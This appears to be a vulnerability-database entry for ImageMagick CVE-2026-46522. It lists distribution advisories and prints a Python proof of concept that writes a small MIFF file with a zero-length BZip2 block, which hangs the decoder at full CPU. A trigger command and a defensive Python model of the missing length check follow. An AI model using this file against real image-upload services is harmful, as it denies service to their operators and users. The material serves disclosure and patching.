| Title | Published | Views | Family |
|---|---|---|---|
| Amazon Linux 2 : ImageMagick, --advisory ALAS2-2026-3346 (ALAS-2026-3346) | 8 Jun 2026 00:00 | – | nessus |
| Debian dla-4609 : imagemagick - security update | 30 May 2026 00:00 | – | nessus |
| Debian dsa-6298 : imagemagick - security update | 27 May 2026 00:00 | – | nessus |
| Debian dsa-6310 : imagemagick - security update | 30 May 2026 00:00 | – | nessus |
| Linux Distros Unpatched Vulnerability : CVE-2026-46522 | 22 May 2026 00:00 | – | nessus |
| Medium: ImageMagick | 8 Jun 2026 00:00 | – | amazon |
| Medium: ImageMagick | 22 Jun 2026 00:00 | – | amazon |
| CVE-2026-46522 | 10 Jun 2026 21:30 | – | alpinelinux |
| CVE-2026-46522 | 11 Jun 2026 05:03 | – | circl |
| ImageMagick security vulnerabilities | 29 May 2026 00:00 | – | cnnvd |

```python
# Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion
# Google Dork: N/A
# Date: 2026-05-13
# Exploit Author: Jose Rivas (bl4cksku11) & Zero Trust Offsec
# Vendor Homepage: https://imagemagick.org/
# Software Link: https://imagemagick.org/download/
# Version: ImageMagick 7.x, verified on 7.1.2-3 system
# CVE : CVE-2026-46522
# GHSA: https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7gg8-qqx7-92g5
"""
Description
-----------
coders/miff.c ReadMIFFImage BZip2 branch does not reject length=0 in the
per-block compressed length prefix. BZ2_bzDecompress with avail_in=0 returns
BZ_OK silently, and the IM loop only exits on BZ_STREAM_END or on codes that
are neither BZ_OK nor BZ_STREAM_END. The loop spins forever consuming CPU.

LZMA and Zip branches have the same code shape but their decompressor
libraries return BUF_ERROR on empty input, so they bail out.

Minimal PoC is 224 bytes. Single HTTP upload pegs a worker at 100 percent CPU
until killed by a request timeout or by the OS.

Usage
-----
    python3 miff_bzip_dos.py [OUTPUT_PATH]

Default OUTPUT_PATH is /tmp/poc.miff. Then trigger:

    /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\
        timeout 5 magick identify /tmp/poc.miff

Expected output:

    Command exited with non-zero status 124
    wall=5.00s user=5.00s cpu=100% exit=124

The process never finishes on its own. Timeout kills it.
"""
import os
import sys


def craft_miff(path: str) -> None:
    # MIFF text header selecting the BZip compression branch.
    header = (
        b"id=ImageMagick version=1.0\n"
        b"class=DirectClass colors=0 alpha-trait=Undefined\n"
        b"number-channels=3 number-meta-channels=0 channel-mask=0x0000000000000007\n"
        b"columns=1 rows=1 depth=8\n"
        b"colorspace=sRGB compression=BZip quality=75\n"
        b"\x0c\n"  # form feed terminator, then one byte consumed by ReadBlobByte
    )
    body = b"\x00\x00\x00\x00"  # 4-byte MSB length=0, triggers the infinite loop
    with open(path, "wb") as f:
        f.write(header + body)
    print(f"[+] Wrote {path} ({os.path.getsize(path)} bytes)")
    print("[+] Trigger with:")
    print(" /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\")
    print(f" timeout 5 magick identify {path}")


if __name__ == "__main__":
    craft_miff(sys.argv[1] if len(sys.argv) > 1 else "/tmp/poc.miff")
```
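
The missing length check from the description, modelled with Python's `bz2` module as an added example; it is not ImageMagick's code and not part of the original PoC. The names `decode_pixels`, `read_exact`, `frame`, `CorruptImage` and `StalledDecoder` are hypothetical, the 4-byte MSB block framing is taken from the PoC's comment, and the `budget` cap exists only so the unguarded variant terminates here.

```python
import bz2
import io
import struct


class CorruptImage(ValueError):
    """Input rejected before it can stall the decoder."""


class StalledDecoder(RuntimeError):
    """Iteration budget spent without producing the requested bytes."""


def read_exact(blob, n):
    data = blob.read(n)
    if len(data) != n:
        raise CorruptImage("truncated input")
    return data


def decode_pixels(blob, want, guard=True, budget=10_000):
    """Inflate `want` bytes from blocks framed as 4-byte MSB length + data."""
    decomp = bz2.BZ2Decompressor()
    out = bytearray()
    for _ in range(budget):
        (length,) = struct.unpack(">I", read_exact(blob, 4))
        if guard and length == 0:
            # An empty block gives bzip2 nothing to consume, so reject it here.
            raise CorruptImage("zero-length compressed block")
        out += decomp.decompress(read_exact(blob, length), want - len(out))
        if len(out) == want:
            return bytes(out)
        if decomp.eof:
            raise CorruptImage("bzip2 stream ended before all pixels arrived")
    raise StalledDecoder(f"{len(out)}/{want} bytes after {budget} iterations")


def frame(*blocks):  # length-prefix each block (builds the constructed samples)
    return b"".join(struct.pack(">I", len(b)) + b for b in blocks)


if __name__ == "__main__":
    packed = bz2.compress(bytes(range(12)))  # constructed sample pixels
    print(decode_pixels(io.BytesIO(frame(packed[:20], packed[20:])), 12).hex())
    for guard in (True, False):  # ten zero-length blocks, constructed
        try:
            decode_pixels(io.BytesIO(frame(*[b""] * 10)), 12, guard, budget=10)
        except (CorruptImage, StalledDecoder) as exc:
            print(f"guard={guard}: {type(exc).__name__}: {exc}")
```

With the guard on, the first empty block is refused; with it off, every iteration returns zero bytes without an error, which is the non-terminating shape the description attributes to the BZip2 branch.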